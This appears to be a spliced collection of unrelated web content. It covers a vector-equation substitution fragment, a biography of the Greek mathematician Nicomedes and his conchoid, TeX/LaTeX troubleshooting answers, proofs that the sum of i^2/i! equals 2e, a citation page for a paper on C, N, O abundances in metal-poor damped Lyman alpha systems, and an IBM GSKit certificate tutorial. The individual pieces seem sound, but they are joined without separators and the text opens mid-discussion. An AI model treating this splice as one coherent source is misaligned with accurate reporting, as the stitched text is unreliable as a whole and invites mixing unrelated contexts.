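To see it concretely (a step not spelled out in the thread), substitute $s = \lambda + \frac12$ into the first form:

$\mathbf{r} = \left(3\mathbf{i}+\mathbf{j}-\frac72\mathbf{k}\right)+\left(\lambda+\frac12\right)\left(8\mathbf{i}-4\mathbf{j}+5\mathbf{k}\right) = \left(7\mathbf{i}-\mathbf{j}-\mathbf{k}\right)+\lambda\left(8\mathbf{i}-4\mathbf{j}+5\mathbf{k}\right),$

since $\frac12\left(8\mathbf{i}-4\mathbf{j}+5\mathbf{k}\right) = 4\mathbf{i}-2\mathbf{j}+\frac52\mathbf{k}$, and $3+4=7$, $1-2=-1$, $-\frac72+\frac52=-1$.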
# Nicomedes
### Quick Info
Born
Greece
Died
Summary
Nicomedes was a Greek mathematician famous for his treatise On conchoid lines which contains his discovery of the conchoid curve which he used to solve various mathematical problems, including the trisection of angles.
### Biography
We know nothing of Nicomedes' life. To make a guess at dating his life we have some limits which are given by references to his work. Nicomedes himself criticised the method that Eratosthenes used to duplicate the cube, and we can make a reasonably accurate guess at Eratosthenes' life span (276 BC - 194 BC). A less certain piece of information comes from Apollonius choosing to name a curve 'sister of the conchoid', which is assumed to be a name he chose to compliment Nicomedes' discovery of the conchoid. Since Apollonius lived from about 262 BC to 190 BC, these two pieces of information give a fairly accurate estimate of Nicomedes' dates. However, as we remarked, the second of these pieces of information cannot be relied on; nevertheless, from what we know of the mathematics of Nicomedes, the deduced dates are fairly convincing.
Nicomedes is famous for his treatise On conchoid lines which contains his discovery of the curve known as the conchoid of Nicomedes. How did Nicomedes define the curve? Consider the diagram. We are given a line $XY$ and a point $A$ not on the line. $ABC$ is drawn perpendicular to $XY$, cutting it at $B$ and with the length $BC$ equal to some fixed value, say $b$. Then rotate $ABC$ about $A$ so that, in an arbitrary position $ADE$, we have $DE = b$. So if a point $P$ on the conchoid is joined to $A$, then $PA$ cuts the line $XY$ in a point at distance $b$ from $P$.
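The construction can also be sketched numerically (a hypothetical illustration, not anything from the treatise; the polar form r = a/cos(theta) + b is the modern parameterisation, with the pole A at the origin and the line XY at distance a from A):

```python
import math

def conchoid_points(a, b, n=201, theta_max=1.2):
    """Sample points on the conchoid of Nicomedes.

    The pole A is at the origin and the fixed line XY is x = a (so the
    perpendicular AB has length a); theta is the angle of the ray AP
    measured from AB.  Each ray meets XY at distance a/cos(theta) from
    A, and P lies a further b along the ray, so r = a/cos(theta) + b.
    """
    pts = []
    for i in range(n):
        theta = -theta_max + 2.0 * theta_max * i / (n - 1)
        r = a / math.cos(theta) + b
        pts.append((r * math.cos(theta), r * math.sin(theta)))
    return pts
```

By construction, every sampled point lies exactly distance b beyond the point where its ray from A crosses the line, which is the defining property stated above.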
Nicomedes recognised three distinct forms in this family but the sources do not go into detail on this point. It is believed that they must be the three branches of the curve. The conchoid can be used in solving both the problems of trisection of an angle and of the duplication of a cube. Both these problems were solved by Nicomedes using the conchoid, in fact as Toomer writes in [1]:-
As far as is known, all applications of the conchoid made in antiquity were developed by Nicomedes himself. It was not until the late sixteenth century, when the works of Pappus and Eutocius describing the curve became generally known, that interest in it revived...
As indicated in this quote Pappus also wrote about Nicomedes, in particular he wrote about his solution to the problem of trisecting an angle (see for example [2]):-
Nicomedes trisected any rectilinear angle by means of the conchoidal curves, the construction, order and properties of which he handed down, being himself the discoverer of their peculiar character.
Nicomedes also used the quadratrix, discovered by Hippias, to solve the problem of squaring the circle. Pappus tells us (see for example [2]):-
For the squaring of the circle there was used by Dinostratus, Nicomedes and certain other later persons a certain curve which took its name from this property, for it is called by them square-forming
Eutocius tells us that Nicomedes [2]:-
... prided himself inordinately on his discovery of this curve, contrasting it with Eratosthenes' mechanism for finding any number of mean proportionals, to which he objected formally and at length on the ground that it was impracticable and entirely outside the spirit of geometry.
### References (show)
1. G J Toomer, Biography in Dictionary of Scientific Biography (New York 1970-1990). See THIS LINK.
2. T L Heath, A History of Greek Mathematics (2 Vols.) (Oxford, 1921).
3. G Loria, Le scienze esatte nell'antica Grecia (Milan, 1914), 404-410.
4. A Seidenberg, Remarks on Nicomedes' duplication, Arch. History Exact Sci. 3 (1966), 97-101.
Tag Info
0
Since version 2.8.6, TeXstudio supports [txs-app-dir] and [txs-settings-dir] as part of the path definition of commands. In your case, something like this should do the trick: [txs-app-dir]\..\MikTexPortable\miktex\bin\pdflatex.exe For further details, see the manual.
1
There's always excel2latex; I'm not sure how well it works, but it's on CTAN. If this or some similar program doesn't work, and it is absolutely, positively not an option to recreate these tables in LaTeX, the best you'll probably be able to manage is convert them to an image and include them that way. It seems that there are some convoluted ways to do ...
1
To say it short: No. A little bit longer: if you want good-looking tables, you can find hints in several books on typography (for example the German books "Lesetypografie" or "Detailtypografie"; I do not have English titles, sorry) that for good typography you should use empty space and no lines. Only to mark the header and the bottom of a table ...
1
Based on @Ignasi's answer and the link he posted about using an editor with PdfLaTeX, the solution is as follows: from foolabs.com download xpdf and unpack it to a location on your computer. In Computer Properties go to Advanced system settings -> Environment Variables and add the path of your particular xpdfbin\bin to the path. This will enable Windows to find ...
0
Created C:\Local TeX Files. Put the zipped fonts distribution in this directory and unzipped it there. Click Start → Programs → MiKTeX 2.9 → Maintenance → Settings to open the MiKTeX Options window, then click on the Roots tab. The Roots page shows the list of currently registered root directories. Click Add. In the following dialog box, browse to C:\Local TeX Files ...
3
This is what the externalize TikZ library does. Try to compile the following code with the command pdflatex --shell-escape levels (levels being the name of the file). As a result you'll get a pdf file with the whole document, but also another file called levels-figure0.pdf which contains the TikZ figure. In fact you'll get as many levels-figureXXX.pdf files as ...
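The listing the answer refers to did not survive extraction; a minimal self-contained sketch of what such a levels.tex might look like (the file name and the drawn circle are assumptions) is:

```latex
% levels.tex -- compile with: pdflatex --shell-escape levels
\documentclass{article}
\usepackage{tikz}
\usetikzlibrary{external}
\tikzexternalize % every tikzpicture is compiled to its own PDF
\begin{document}
Some surrounding text.
\begin{tikzpicture}
  \draw (0,0) circle (1cm); % externalised as levels-figure0.pdf
\end{tikzpicture}
\end{document}
```

Each tikzpicture in the document is then externalised to its own levels-figureXXX.pdf, numbered in order of appearance.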
0
The error message "Fatal format file error; I'm stymied" means that TeX binary is trying to load latex.fmt (or pdflatex.fmt) but the version of this TeX binary differs from another TeX binary which created such latex.fmt. There could be two reasons: you have installed two TeX binaries (in different versions) or you have somewhere in your computer the old ...
2
Hi. A new version of Asymptote, v2.33, was released today. From the update notes: A work around was implemented for the missing epswrite driver in ghostscript-9.15. So it seems that you can use Ghostscript >= 9.15 with Asymptote 2.33. Old message: see Building with asymptote: file-2.tex not found, null surface and also Labels in 3D mode don't work in ...
0
It is a permission issue related to Windows 8. It is not necessary to make the user less secure. Right click on the application you need to run and from the context menu select "Run as Administrator." For instance, if you are using TeXnicCenter for compiling your text, right click on its shortcut you might have on the desktop or the Windows 8 apps style alternative and run it ...
Your template passes the option dvips to graphicx. But as you are using pdflatex (and not latex + dvips), you are lying to latex and so it doesn't look for the correct graphic type. Remove the option and hope that your template doesn't do more such silly things.
You can save your plot as a pdf file in Mathematica; for example, "ttc.pdf". Then include it in your tex file: \includegraphics[width=0.45\textwidth]{ttc.pdf}
The answer is as @Sigur wrote: run (pdf)latex + bibtex + (pdf)latex + (pdf)latex [+ preview] In TeXmaker, this can be done using shortcuts F6 + F11 + F6 + F6 [+ F7].
Alexander's answer was the one that got me going. The python.sty file from python.sty on github worked fine when I changed line 61 from: cat \@pythoninclude\space bin/\jobname.py | python > bin/\jobname.py.out 2> bin/\jobname.py.err to: python \jobname.py > \jobname.py.out 2> \jobname.py.err As you can see, I also removed the bin folder. So I ...
There is a reference in newtx to newpx, it is in newtx.map: ntx-Italic-tlf-th-t1 ntxtmri " encntx-ecth-tlf ReEncodeFont " <[ntx-ecth-tlf.enc <ntxtmri.pfb ntx-Italic-osf-th-t1 ntxtmri " encntx-ecth-osf ReEncodeFont " <[ntx-ecth-osf.enc <ntxtmri.pfb
How did you compile your document.tex? It turns out that some LaTeX editors do not add the -shell-escape option when compiling. If you do not have it (on the command line, or in the LaTeX editor of your choice), try using lualatex -shell-escape document.tex. For example, in TeXstudio or Texmaker the LuaLaTeX command has to be changed from lualatex -synctex=1 ...
Installing the newpx package seems to have helped. Both packages are by the same author, but there seems to be no reference to newpx in the newtx package. This probably qualifies as a bug report, will investigate. UPDATE: According to Michael Sharpe, the package author, this is an unwanted dependency which should be corrected soon.
MiKTeX is what is called a TeX distribution. It is not a single program that you start – it is a collection of programs and files necessary to start working with TeX. MiKTeX will likely have installed a program called "TeXworks". TeXworks is a very basic editor that makes it more comfortable to write TeX and LaTeX files (remembering that these are just ...
After MiKTeX, you have to install GSView, Ghostscript, and an editor (e.g., TeXStudio). At this point you have a complete LaTeX system.
# How do I prove that: $\sum_{i=0}^{\infty} \frac{i^2}{i!}=2e$ [duplicate]
I've seen in Wolfram Alpha that $$\sum_{i=0}^{\infty} \frac{i^2}{i!}=2e$$ but I have no idea how to prove that.
Can anyone help me?
Thanks.
Consider $$S=\sum_{i=0}^{\infty} \frac{i^2}{i!}x^i=\sum_{i=0}^{\infty} \frac{i(i-1)+i}{i!}x^i=\sum_{i=0}^{\infty} \frac{i(i-1)}{i!}x^i+\sum_{i=0}^{\infty} \frac{i}{i!}x^i$$ $$S=x^2\sum_{i=0}^{\infty} \frac{i(i-1)}{i!}x^{i-2}+x\sum_{i=0}^{\infty} \frac{i}{i!}x^{i-1}$$ $$S=x^2\left(\sum_{i=0}^{\infty} \frac{x^i}{i!}\right)''+x\left(\sum_{i=0}^{\infty} \frac{x^i}{i!}\right)'=x^2e^x+xe^x$$ Now, use $x=1$.
Edit
Suppose that, instead of $i^2$, you faced $i^3$. It would be the same approach using $$i^3=i(i-1)(i-2)+3i(i-1)+i$$ Similarly $$i^4=i(i-1)(i-2)(i-3)+6i(i-1)(i-2)+7i(i-1)+i$$ Sooner or later, you will learn that $$S_k=\sum_{i=0}^{\infty} \frac{i^k}{i!}=B_k\, e$$ where the $B_k$ are the Bell numbers. These grow extremely fast $(B_{20}=51724158235372)$.
$$\begin{aligned}\sum_{i=0}^\infty \dfrac{i^2 z^i}{i!} &= \sum_{i=0}^\infty \left(z \dfrac{d}{dz}\right)\left(z \dfrac{d}{dz}\right) \dfrac{z^i}{i!}\\ &= z \dfrac{d}{dz}\, z \dfrac{d}{dz}\, e^z\\ &= z (z+1) e^z\end{aligned}$$
Now substitute $z=1$.
The short way:
$$\sum_{i=0}^{\infty} \frac{i^2}{i!}=\sum_{i=1}^{\infty} \frac{i}{(i-1)!}=\sum_{i=0}^{\infty} \frac{i+1}{i!}=\sum_{i=1}^{\infty} \frac1{(i-1)!}+\sum_{i=0}^{\infty} \frac1{i!}=2\sum_{i=0}^{\infty} \frac1{i!}.$$ |
C, N, O abundances in the most metal-poor damped Lyman alpha systems★
@article{Pettini2008CNO,
title={C, N, O abundances in the most metal-poor damped Lyman alpha systems★},
author={Max Pettini and Berkeley J. Zych and Charles C. Steidel and Frederic H. Chaffee},
journal={Monthly Notices of the Royal Astronomical Society},
year={2008},
volume={385},
pages={2011-2024}
}
• Published 11 December 2007
• Physics
• Monthly Notices of the Royal Astronomical Society
This study focuses on some of the most metal-poor damped Lyα (DLA) absorbers known in the spectra of high-redshift QSOs, using new and archival observations obtained with ultraviolet-sensitive echelle spectrographs on the Keck and VLT telescopes. The weakness and simple velocity structure of the absorption lines in these systems allow us to measure the abundances of several elements, and in particular those of C, N and O, a group that is difficult to study in DLAs of more typical metallicities…
132 Citations
The most metal-poor damped Lyα systems: insights into chemical evolution in the very metal-poor regime★
• Physics
• 2011
We present a high spectral resolution survey of the most metal-poor damped Lyα absorption systems (DLAs) aimed at probing the nature and nucleosynthesis of the earliest generations of stars. Our…
Implications of a non-universal IMF from C, N, and O abundances in very metal-poor Galactic stars and damped Lyα absorbers
• Physics
• 2011
Recently revealed C, N, and O abundances in the most metal-poor damped Lyα (DLA) absorbers are compared with those of extremely metal-poor stars in the Galactic halo, as well as extragalactic H II…
The chemistry of the most metal-rich damped Lyman α systems at z ∼ 2 – II. Context with the Local Group
• Physics
• 2015
Using our sample of the most metal-rich damped Lyman $\alpha$ systems (DLAs) at z$\sim2$, and two literature compilations of chemical abundances in 341 DLAs and 2818 stars, we present an analysis of…
THE MOST METAL-POOR DAMPED Lyα SYSTEMS: AN INSIGHT INTO DWARF GALAXIES AT HIGH-REDSHIFT
In this paper we analyze the kinematics, chemistry, and physical properties of a sample of the most metal-poor damped Lyα systems (DLAs), to uncover their links to modern-day galaxies. We present…
The C/O ratio at low metallicity: constraints on early chemical evolution from observations of Galactic halo stars
• Physics
• 2009
Aims. We present new measurements of the abundances of carbon and oxygen derived from high-excitation C i and O i absorption lines in metal-poor halo stars, with the aim of clarifying the main…
Discovery of the most metal-poor damped Lyman-α system
We report the discovery and analysis of the most metal-poor damped Lyman α (DLA) system currently known, based on observations made with the Keck HIRES spectrograph. The metal paucity of this system…
Metallicity Evolution of Damped Lyman-alpha Systems out to z~5
• Physics
• 2012
We present chemical abundance measurements for 47 damped Lyman-alpha systems (DLAs), 30 at z>4, observed with the Echellette Spectrograph and Imager and the High Resolution Echelle Spectrometer on…
The First Observations of Low-redshift Damped Lyα Systems with the Cosmic Origins Spectrograph: Chemical Abundances and Affiliated Galaxies
We present Cosmic Origins Spectrograph (COS) measurements of metal abundances in eight 0.083 < zabs < 0.321 damped Lyman-α (DLA) and sub-damped Lyα absorption systems serendipitously discovered in…
A carbon-enhanced metal-poor damped Lyα system: probing gas from Population III nucleosynthesis?
• Physics
• 2010
We present high-resolution observations of an extremely metal-poor damped Lyα system (DLA), at z_abs = 2.3400972 in the spectrum of the QSO J0035−0918, exhibiting an abundance pattern consistent…
Metal-enriched plasma in protogalactic halos. A survey of N V absorption in high-z damped and sub-da
We continue our recent work of characterizing the plasma content of high-redshift damped and sub-damped Lyman-α systems (DLAs/sub-DLAs), which represent multi-phase gaseous (proto)galactic disks and…
References
The abundances of nitrogen and oxygen in damped lyman alpha systems
We take a fresh look at the abundance of nitrogen in damped Lyman α systems (DLAs) with oxygen abundances between 1/10 and 1/100 of solar. This is a metallicity regime poorly sampled in the local…
The Evolution of the C/O Ratio in Metal-poor Halo Stars
• Physics
• 2004
We report new measurements of carbon and oxygen abundances in 34 F and G dwarf and subgiant stars belonging to the halo population and spanning a range of metallicity from [Fe/H] = −0.7 to −3.2. The…
On the Determination of N and O Abundances in Low Metallicity Systems
• Physics
• 2006
We show that in order to minimize the uncertainties in the N and O abundances of low-mass, low-metallicity (O/H ≤ 1/5 solar) emission-line galaxies, it is necessary to employ separate…
Element Abundances at High Redshifts: The N/O Ratio in a Primeval Galaxy
• Physics
• 1995
The damped Lyman alpha systems seen in the spectra of high redshift QSOs offer the means to determine element abundances in galaxies observed while still at an early stage of evolution. Such…
A homogeneous sample of sub-damped Lyman α systems – IV. Global metallicity evolution
An accurate method to measure the abundance of high-redshift galaxies involves the observation of absorbers along the line of sight towards a background quasar. Here, we present abundance…
Metal abundances and ionization conditions in a possibly dust-free damped Ly-alpha system at z=2.3
We have obtained a high resolution, high S/N UVES spectrum of the bright QSO HE2243-6031 to analyze the damped Ly-alpha system (DLA) observed at z=2.33. The metallicity of this system is 1/12 solar…
A comprehensive set of elemental abundances in damped Lyα systems: Revealing the nature of these high-redshift galaxies
By combining our UVES-VLT spectra of a sample of four damped Lyα systems (DLAs) toward the quasars Q0100+13, Q1331+17, Q2231−00 and Q2343+12 with the existing HIRES-Keck spectra, we covered the total…
First stars VI - Abundances of C, N, O, Li, and mixing in extremely metal-poor giants. Galactic evolution of the light elements
We have investigated the poorly-understood origin of nitrogen in the early Galaxy by determining N abundances from the NH band at 336 nm in 35 extremely metal-poor halo giants, with carbon and oxygen…
A homogeneous sample of sub-damped Lyman α systems- I. Construction of the sample and chemical abundance measurements
In this first paper of a series, we report on the use of quasar spectra obtained with the high-resolution Ultraviolet-Visual Echelle Spectrograph (UVES) and available through the European Southern…
Early stages of Nitrogen enrichment in galaxies: Clues from measurements in damped Lyman alpha systems
• Physics
• 2003
We present 4 new measurements of nitrogen abundances and one upper limit in damped Lyα absorbers (DLAs) obtained by means of high resolution (FWHM ≃ 7 km s⁻¹) UVES/VLT spectra. In addition to…
# Managing certificates with IBM GSKit
An easy guide to creating, signing, installing, and using certificates with IBM Global Security Kit
This tutorial explains how to set up and use IBM Global Security Kit (GSKit) for typical certificate management tasks such as self-signed certificate generation, creation of a Certificate Authority (CA), requesting a certificate from a third-party CA, and installing certificates for use in SSL protocols.
Share:
Alexei Kojenov (kojenova@us.ibm.com), Advisory Software Engineer, IBM China
Alexei Kojenov has been a member of the Tivoli Storage Manager (TSM) development team since 2000. In the last several years, his primary focus has been on the security features of the product. He participated in implementation of AES encryption and SSL support in TSM using GSKit. He has extensive knowledge of secure programming and other security practices. He is also the lead Linux developer for TSM client.
06 November 2012
## Before you start
This tutorial describes how to use IBM GSKit and OpenSSL tools for common certificate management tasks. It is not a general tutorial on public key cryptography, X.509 certificates, or SSL/TLS.
IBM Global Security Kit (GSKit) is a common component that is used by a number of IBM products for its cryptographic and SSL/TLS capabilities. While each product provides some minimal documentation on how to use GSKit, this tutorial provides a comprehensive, product neutral tutorial on how to perform common certificate management tasks.
The tasks in this tutorial are described with a command-line approach to ensure they can be incorporated into automation scripts.
### Objectives
In this tutorial, you learn how to locate and set up the GSKit command-line utility, how to create different kinds of digital certificates, how to set up your own Certificate Authority and sign certificates, as well as how to install, use, and switch between certificates.
### Prerequisites
This tutorial is written for system administrators, security specialists, and developers who use IBM products containing GSKit.
### System requirements
You need an IBM product that includes GSKit version 7 or 8. You generally do not need administrative or root access to the system unless you need to install optional OpenSSL software. However, you need read and write access to the certificate key database of your product, which can require administrative or root privileges.
## Overview
### IBM Global Security Kit
IBM Global Security Kit (GSKit) is a library and set of command-line tools that provides SSL implementation along with base cryptographic functions (symmetric and asymmetric ciphers, random number generation, hashing, and so on) and key management.
The underlying cryptographic library, IBM Crypto for C (ICC), is FIPS certified.
GSKit is used by many IBM software products for its security, usability, and FIPS certification. Some products expose and even require a user to use GSKit utilities for certain tasks, while others wrap GSKit's capabilities in their own interfaces.
#### GSKit availability
GSKit is a component and not a stand-alone product. It is not obtainable independent of the products that ship it. GSKit support and updates are provided as part of other products' support and updates.
## Setup
### Understanding GSKit installation methods and versions
GSKit supports two installation methods: global and local. Both types of installations may be present on a system at the same time.
• On a global installation, a single GSKit instance is shared by multiple products. In this configuration, GSKit libraries and executable files are placed in a common location on the system outside of the product's installation directory. If more than one product uses the same GSKit version, these products will not create multiple copies of GSKit, but instead share the single global copy.
• On a local installation, each product has its own, private version of GSKit. In this configuration, GSKit files are placed somewhere within the product's directory structure and their location may or may not be documented. If a global installation exists on the system, it is ignored by the product, which uses only its local installation of GSKit.
Different major versions of GSKit (for example, version 7 and version 8) are separate and can coexist as global installations.
This tutorial discusses GSKit versions 7 and 8 only, not any prior versions. All examples are given for GSKit 8. Unless noted otherwise, the same commands and options that are provided in the examples also work in version 7.
### Finding GSKit on your system
The GSKit command-line tool is named as follows:
gsk<version>capicmd[_64]
where <version> is the GSKit major version (either 7 or 8). The _64 suffix is added on 64-bit platforms. For simplicity, this tutorial omits the suffix, and uses gsk8capicmd in the examples.
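If you script against GSKit, the tool name can be derived at run time. The following is a sketch, not from the GSKit documentation: it assumes GSKit 8 and that 64-bit systems carry the `_64`-suffixed binary, and the mapping from `uname -m` values to the suffix is an assumption.

```shell
# Sketch: derive the GSKit 8 CLI name for this platform.
# The architecture-to-suffix mapping below is an assumption.
GSK_VER=8
case "$(uname -m)" in
  x86_64|amd64|ppc64*|s390x|aarch64) SUFFIX=_64 ;;
  *) SUFFIX= ;;
esac
GSKCMD="gsk${GSK_VER}capicmd${SUFFIX}"
echo "$GSKCMD"
```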
To locate the GSKit installation on your system:
1. Read the product documentation for any guidance on locating and running GSKit. Usually, if a product requires running the GSKit command-line tool, it also documents its location. Some products may provide their own wrapper scripts that set the correct GSKit environment and pass the arguments to the correct instance of GSKit command-line tool. If this is the case, skip the rest of this section and the next section, "Configuring the environment to run GSKit", and use the script name instead of gsk8capicmd.
2. Determine if there is a global installation of GSKit:
• On UNIX or Linux®, enter one of the following commands, gsk7capicmd or gsk8capicmd, on the command line. If anything other than an error message is returned, GSKit is installed and ready to use.
• On Windows®, open Registry Editor and look for one of the following keys:
HKEY_LOCAL_MACHINE\SOFTWARE\IBM\gsk8\CurrentVersion\InstallPath
or
HKEY_LOCAL_MACHINE\SOFTWARE\IBM\gsk7\CurrentVersion\InstallPath
These keys indicate where GSKit is installed.
3. You can search the product's installation directories or the entire file system/disk for files and directories containing "gsk." There are two subdirectories, lib and bin, containing GSKit shared libraries and binaries.
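On UNIX or Linux, that search can be done with `find`. This is a sketch; `/opt/myproduct` is a hypothetical placeholder for your product's installation path:

```shell
# Sketch: look for GSKit lib/bin directories under a product's install tree.
# /opt/myproduct is a placeholder -- substitute your product's actual path.
PRODUCT_DIR="${PRODUCT_DIR:-/opt/myproduct}"
find "$PRODUCT_DIR" -type d -name '*gsk*' 2>/dev/null
```

To search the entire file system instead, use `/` as the starting directory (this can take a while and may need elevated privileges).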
### Configuring the environment to run GSKit
The process to configure your environment to run GSKit varies depending on the type of platform you are using.
#### UNIX and Linux
For global installations of GSKit, no configuration is needed. The command-line tool is already on the executable path, and the libraries are in their standard system location. The GSKit commands can be run from any terminal window.
For local installations of GSKit, add its shared libraries directory to your environment:
export <Shared library path environment variable>=<GSKit library path>
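On Linux the shared library path variable is LD_LIBRARY_PATH (AIX uses LIBPATH, HP-UX uses SHLIB_PATH). A sketch for Linux, with a hypothetical local install path:

```shell
# Sketch: put a local GSKit lib directory on the Linux loader path.
# The directory below is hypothetical -- use your product's GSKit lib path.
GSKIT_LIB=/opt/myproduct/gsk8/lib64
export LD_LIBRARY_PATH="$GSKIT_LIB${LD_LIBRARY_PATH:+:$LD_LIBRARY_PATH}"
echo "$LD_LIBRARY_PATH"
```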
#### Windows
Add both library and binary paths to the PATH environment variable. You can do this either in a command-line window for a single session, or change the global settings. To add the paths using a command line, type:
set PATH=C:\path\to\IBM\gsk8\bin;C:\path\to\IBM\gsk8\lib;%PATH%
### Installing OpenSSL
Some tasks in this tutorial use OpenSSL. See Resources for instructions on obtaining OpenSSL, and follow the OpenSSL instructions for installing it on your system.
### Preparing a key database
GSKit stores public and private keys and certificates in a key database. A key database consists of a file with a .kdb extension and up to three other files with .sth, .rdb, and .crl extensions.
Your product may have already created a key database. If so, look at the product documentation to find its location. If you don't already have a key database, you need to create and initialize a new one.
To create and initialize a new key database, run the following command (depending on your version):
• Version 7:
gsk7capicmd -keydb -create -db <filename>.kdb -pw <password> -stash
• Version 8:
gsk8capicmd -keydb -create -populate -db <filename>.kdb -pw <password> -stash
The -db parameter indicates the file name for the new key database. The -pw parameter indicates the password to use to protect the key database file. The -populate parameter in version 8 is optional and tells GSKit to populate the key database with a number of predefined trusted CA certificates. Version 7 always populates the new key database with the predefined trusted CA certificates. The -stash parameter tells GSKit to save the specified key database password locally in the .sth file so that it doesn't have to be entered on the command line in the future.
In the example scenarios in this tutorial, the following key database names are used:
• server.kdb: Server key database
• client.kdb: Client key database
• ca.kdb: Certificate Authority key database
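The three key databases can be prepared in one pass. Because `gsk8capicmd` may not yet be on your PATH, the sketch below only prints the commands (a dry run); drop the `echo` to execute them, and replace the placeholder password `mypass` with real, distinct passwords:

```shell
# Dry-run sketch: print the creation command for each tutorial key database.
# "mypass" is a placeholder password; drop "echo" to actually run the commands.
for db in server client ca; do
  echo gsk8capicmd -keydb -create -populate -db "${db}.kdb" -pw mypass -stash
done
```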
## Managing self-signed certificates
### Creating a self-signed certificate
A self-signed certificate consists of a public/private key pair and a certificate for the public key that is signed by the corresponding private key. It is also known as a "root" certificate because it sits at the root of a trust chain; a Certificate Authority is built on such a certificate.
Self-signed certificates can also be used in simple scenarios when both the client and the server are known to each other and can exchange certificates securely out-of-band.
To generate a self-signed certificate and store it in the key database, use the following command:
gsk8capicmd -cert -create -db server.kdb -stashed -dn "CN=myserver,OU=mynetwork,O=mycompany,C=mycountry" -expire 7300 -label "My self-signed certificate" -default_cert yes
The -db parameter specifies the key database where the self-signed certificate should be stored. The -dn parameter specifies the distinguished name to use on the public key certificate. The -expire parameter indicates the number of days the certificate is valid. The -label parameter is a name to use for the self-signed certificate within the key database. The -default_cert parameter makes the newly created certificate the default and is an optional parameter.
### Installing the certificate on client systems
For the clients to trust a certificate, its public part needs to be distributed to the clients and stored in their key databases. The process for doing this is:
1. Extract the public part to a file using the following command:
gsk8capicmd -cert -extract -db server.kdb -stashed -label "My self-signed certificate" -format ascii -target mycert.arm
The -db parameter specifies the server key database that contains the certificate to be shared with clients. The -label parameter specifies the certificate's label within the key database. The -target parameter specifies the file name where the exported certificate should be stored.
2. Distribute mycert.arm to the clients.
3. Add the new certificate to the clients' key database as follows:
gsk8capicmd -cert -add -db client.kdb -stashed -label "Server self-signed certificate" -file mycert.arm -format ascii -trust enable
The -db parameter specifies the name of the client's key database file. The -label parameter specifies the label to be used for the certificate inside the key database file. The -file parameter specifies the file containing the certificate to be imported.
## Creating a Certificate Authority (CA)
### Creating a CA using GSKit
1. Initialize the CA key database and create the CA certificate. For example:
gsk8capicmd -keydb -create -db ca.kdb -pw mypass -stash
gsk8capicmd -cert -create -db ca.kdb -stashed -dn CN=CA,O=CA,C=US -expire 7300 -label "CA cert" -default_cert yes
The -db parameter specifies the file name to be used for the CA's key database file. The -pw parameter specifies the password to use to protect the key database file. The -expire parameter specifies the number of days before the certificate expires. The -dn parameter specifies the distinguished name to use on the CA certificate. The -label parameter specifies the name to be used for the CA certificate in the key database file.
2. Extract the CA's root certificate. This certificate must be installed at both the clients and servers:
gsk8capicmd -cert -extract -db ca.kdb -stashed -label "CA cert" -format ascii -target ca.arm
The -db parameter specifies the file name of the CA's key database file. The -label parameter specifies the CA's certificate label in the key database file. The -target parameter specifies the file that is stored in the exported CA certificate.
### Issuing a server certificate with a CA
For clients to verify a server's identity, the CA must issue a signed server certificate to the server.
1. The CA's root certificate must be added to the server's key database and marked as trusted, as follows:
gsk8capicmd -cert -add -db server.kdb -stashed -label "My CA root" -file ca.arm -format ascii -trust enable
The -db parameter specifies the name of the server's key database file. The -label parameter specifies the label to use for the CA's root certificate in the database file. The -file parameter specifies the file that contains the CA's root certificate.
2. At the server, create a server certificate request as follows:
gsk8capicmd -certreq -create -db server.kdb -stashed -label "My CA signed certificate" -dn "CN=host.mycompany.com,OU=unit,O=company" -file cert_request.arm
The -db parameter specifies the name of the server's key database file. The -label parameter specifies the label to use for the server certificate in the key database file. The -dn parameter specifies the distinguished name to use on the certificate. The CN parameter specifies the DNS name of your server, which is necessary for an SSL client to validate the certificate.
You can also request a subject alternative name (SAN) extension by using -san_dnsname or -san_ipaddr options (not supported in version 7). For example:
gsk8capicmd -certreq -create -db server.kdb -stashed -label "My CA signed certificate" -dn "CN=host.mycompany.com,OU=unit,O=company" -san_dnsname "host1.mycompany.com,host2.mycompany.com" -san_ipaddr "10.10.10.1,10.10.10.2" -file cert_request.arm
3. The certificate request must be transported to the CA, and the CA must sign the certificate as follows:
gsk8capicmd -cert -sign -file cert_request.arm -db ca.kdb -stashed -label "CA cert" -target cert_signed.arm -expire 364
The -file parameter specifies the file that contains the certificate request. The -db parameter specifies the name of the CA's key database file. The -label parameter specifies the label of the CA's root certificate that should be used to sign the certificate request. The -target parameter specifies the file to be used for the signed server certificate.
If a SAN extension was requested in the server certificate request, you can either use the -preserve option to keep the requested values or override them by specifying your own -san_dnsname or -san_ipaddr options with the -sign command (not supported in version 7). If you use both -preserve with -san_dnsname or -san_ipaddr, the values are merged with the ones requested. For example:
gsk8capicmd -cert -sign -file cert_request.arm -db ca.kdb -stashed -label "CA cert" -target cert_signed.arm -expire 364 -preserve -san_dnsname "host3.mycompany.com" -san_ipaddr "10.10.10.3"
Note: At the time of this writing (GSKit version 8.0.14.22), there is a bug that generates invalid extensions when both -preserve and -san_dnsname or -san_ipaddr options are used. This bug prevents servers from receiving certificates that are signed with this combination of options. Avoid using -preserve until this problem is fixed.
4. The server must receive the signed certificate from the CA and set it as the default for communicating with clients as follows:
gsk8capicmd -cert -receive -db server.kdb -stashed -file cert_signed.arm -default_cert yes
The -db parameter specifies the name of the server's key database file. The -file parameter specifies the name of the file that contains the signed server certificate.
### Distributing the CA root certificate to clients
For your clients to validate the signed certificate that they receive from the server during an SSL connection, they must trust your Certificate Authority. This is achieved by installing the CA root certificate on the clients.
1. Transfer the CA root certificate to clients. (See the ca.arm file created above.)
2. Add the CA root certificate to the client key database and enable trust as follows:
gsk8capicmd -cert -add -db client.kdb -stashed -label "My CA root" -file ca.arm -format ascii -trust enable
The -db parameter specifies the client's key database file to store the CA's root certificate. The -file parameter specifies the file that contains the CA's root certificate.
## Using a third-party Certificate Authority
### Install the CA root certificate
Instead of setting up its own certificate authority, a company may use a third-party certificate authority to sign its server certificates. The client and server must have access to the third-party CA's root certificate to verify the server certificates that are signed by the third-party CA.
GSKit ships with a collection of third-party root certificates from well-known CA companies, such as Thawte, Verisign, and Entrust. If the server is going to use one of these well-known companies to sign its certificates, this step can be skipped. But if the server is going to use certificates from a third-party CA whose root certificate is not shipped with GSKit, the third-party CA's root certificate must be imported to both the server and the clients' key database files as follows:
1. Obtain the CA root certificate. The process for this varies depending on the third-party CA's procedures. Third-party CAs often make their root certificates available for download.
2. Add the third-party's root CA certificate to both server and client key databases and mark it as trusted as follows:
gsk8capicmd -cert -add -db server.kdb -stashed -label "Some CA root" -file ca.der -format binary -trust enable
gsk8capicmd -cert -add -db client.kdb -stashed -label "Some CA root" -file ca.der -format binary -trust enable
